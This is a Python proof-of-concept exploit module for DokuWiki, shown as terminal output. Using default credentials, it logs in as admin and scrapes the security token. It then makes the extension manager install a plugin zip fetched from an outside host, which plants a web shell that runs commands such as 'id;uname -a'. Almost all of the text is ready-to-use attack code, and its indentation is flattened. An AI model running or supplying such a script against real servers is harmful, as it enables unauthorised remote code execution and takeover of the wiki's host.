DokuWiki Proof Of Concept Shell Upload

`c@kali:~/src/napalm2.2/modules$ cat shell-dokuwiki.py  
#!/usr/bin/env python  
# shell-dokuwiki.py - module to upload shell, based on previous version  
# created 28.04.2017. Bug ('feature') is exploitable only  
# when you will have a valid credentials.  
# for this proof-of-concept you'll also need host with you.r/shell.zip  
#  
  
import sys  
import re  
import requests  
  
print '[+] Module : dokuwiki - started.'  
  
print  
target = raw_input("[+] Hostname> ")  
logMe = target + '/doku.php?id=start&do=login&sectok='  
print  
  
session = requests.session()  
login_data = dict(u='user', p='bitnami')  
req = session.post(logMe, data=login_data)  
  
# 2nd req:  
afterPage = target + '/doku.php?id=start&do=admin&page=extension&tab=install'  
req2 = session.get(afterPage)  
  
resp = req2.text  
if 'Log Out' in resp:  
print '[+] We are logged-in as admin. Preparing shell...'  
  
  
req3 = session.get(afterPage)  
resp3 = req3.text  
  
pattern = re.compile('<input type="hidden" name="sectok" value="(.*?)"/>')  
found = re.search(pattern, resp3)  
  
if found:  
sectok = found.group(1)  
print '[+] Found "sectok":' + str( sectok )  
print '[+] Preparing shell params to upload'  
  
data_shell = {  
'sectok':sectok,  
'installurl':'http://192.168.1.205/mishell.zip'  
}  
reqshell = session.post(afterPage, data=data_shell)  
respshell = reqshell.text  
  
md5name = re.compile('<div class="success">Plugin (.*?) installed successfully</div>')  
foundmishell = re.search(md5name, respshell)  
  
if foundmishell:  
print '[+] Mishell name:' + str( foundmishell.group(1))  
  
shellUrl = target + '/lib/plugins/'+foundmishell.group(1)+'/mishell.php?x=id;uname -a'  
verify = session.get(shellUrl)  
vtext = verify.text  
  
print ' ',vtext  
print ''  
print '[+] Your shell should be here:', shellUrl  
  
## can not log in  
else:  
print '[-] Can not login. Something is wrong :C'  
  
  
print '[+] Module : dokuwiki - finished.'  
  
`